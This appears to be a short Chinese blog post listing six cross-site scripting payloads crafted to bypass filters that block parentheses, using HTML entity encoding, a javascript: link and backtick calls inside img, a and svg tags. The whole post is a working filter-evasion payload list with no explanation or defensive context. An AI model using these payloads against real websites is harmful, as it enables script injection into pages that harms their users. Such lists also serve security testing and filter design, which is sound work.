XSS过滤圆括号一些可执行的payload 

<img src=1111111 onerror=alert&lpar;1&rpar;>   
<img src=1111111 onerror=javascript:alert&#x28;1&#x29>
<a href="javascript:alert&#40/1/&#41">axxx</a>
<svg><script>alert&#40      1&#41 </script></svg>
<img src=1 onerror=alert&#40;1&#41;>
<img src=x onerror=alert`1`>

posted on 2021-05-18 10:38  tech_lee  阅读(1412)  评论(0)    收藏  举报

导航